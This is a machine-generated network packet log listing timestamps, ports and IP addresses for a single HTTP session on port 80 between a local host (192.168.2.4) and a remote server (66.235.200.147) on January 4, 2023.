Jan 4, 2023 16:47:45.296660900 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296679974 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296686888 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296700001 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296709061 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296720982 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296740055 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296745062 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296761036 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296781063 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296786070 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296802044 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296803951 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296822071 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296833992 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296843052 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296861887 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296880007 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296897888 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296916962 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296921968 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296921968 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296921968 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296936989 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296947002 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296957970 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296977043 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.296979904 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.296997070 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297008991 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.297015905 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297034979 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297041893 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.297055006 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297074080 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297075033 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.297094107 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297097921 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.297112942 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297127962 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.297133923 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297148943 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.297154903 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297175884 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297180891 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.297195911 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297213078 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.297214985 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297236919 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297243118 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.297256947 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297278881 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.297282934 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297303915 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297312021 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.297322989 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297342062 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297343016 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.297362089 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297374010 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.297382116 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297400951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297405958 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.297420979 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297440052 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297442913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.297460079 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297462940 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.297480106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297493935 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.297499895 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297516108 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.297521114 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297540903 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297547102 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.297560930 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297580004 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297599077 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.297604084 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297612906 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.297625065 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297642946 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.297643900 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297666073 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297672987 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.297687054 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297703028 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.297707081 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297728062 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297734976 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.297748089 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297768116 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297769070 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.297789097 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297810078 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297830105 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297832012 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.297832012 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.297851086 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297862053 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.297872066 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297892094 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297895908 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.297911882 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297925949 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.297931910 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297952890 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297961950 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.297971964 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297991991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.297995090 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.298013926 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298017025 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.298033953 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298053026 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298072100 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298077106 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.298078060 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.298094034 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298100948 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.298115969 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298131943 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.298135042 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298144102 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.298156977 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298175097 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.298176050 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298196077 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.298207045 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298227072 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298228025 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.298248053 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298252106 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.298269033 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298271894 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.298283100 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298302889 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298316956 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.298322916 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298342943 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298350096 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.298363924 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298372030 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.298383951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298403025 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298407078 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.298423052 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298440933 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.298441887 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298463106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298465967 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.298489094 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298495054 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.298496008 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298506975 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298515081 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.298521996 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298536062 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298548937 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298568010 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298584938 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.298588037 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298608065 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298626900 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298634052 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.298648119 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298654079 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.298667908 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298670053 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.298698902 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298711061 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.298736095 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.298743963 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298758984 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.298765898 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298782110 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.298795938 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298808098 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.298815966 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298835039 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298846960 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.298855066 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298871994 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.298875093 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298896074 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298911095 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.298917055 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.298953056 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.299510956 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.305350065 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.305392027 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.305419922 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.305439949 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.305459023 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.305469036 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.305481911 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.305506945 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.305510998 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.305536032 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.305540085 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.305565119 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.305577040 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.305593967 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.305610895 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.305619955 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.305649042 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.305661917 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.305680990 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.305700064 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.305706978 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.305721998 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.305738926 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.305742979 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.305763960 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.305775881 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.305784941 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.305792093 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.305805922 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.305824995 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.305831909 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.305845976 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.305865049 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.305872917 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.305900097 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.305901051 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.305926085 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.305927992 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.305960894 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.305964947 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.305979013 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.305984974 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306001902 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306005001 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306025028 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306030035 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306046963 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306049109 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306067944 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306071997 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306087017 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306093931 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306107998 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306123018 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306133986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306139946 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306160927 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306162119 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306186914 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306197882 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306206942 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306229115 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306256056 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306272984 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306282043 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306303978 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306305885 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306330919 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306338072 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306354046 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306360006 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306379080 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306381941 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306404114 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306421041 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306427002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306442976 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306452036 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306473970 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306476116 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306500912 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306504011 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306524992 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306525946 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306549072 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306550980 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306575060 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306575060 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306595087 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306606054 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306617022 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306627989 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306646109 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306649923 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306674957 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306675911 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306709051 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306718111 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306739092 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306745052 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306761026 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306771040 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306796074 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306797028 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306819916 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306823969 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306839943 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306848049 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306870937 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306874037 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306891918 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306896925 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306911945 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306925058 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306942940 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306951046 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306971073 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306973934 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.306993008 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.306998968 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307022095 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307024002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307043076 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307050943 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307063103 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307076931 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307096004 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307099104 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307120085 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307126045 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307142019 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307153940 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307179928 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307200909 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307204962 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307229996 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307235956 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307270050 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307271004 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307277918 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307288885 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307292938 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307312012 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307323933 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307336092 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307357073 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307357073 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307369947 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307382107 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.307384968 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.307404041 CET	80	49696	66.235.200.147	192.168.2.4
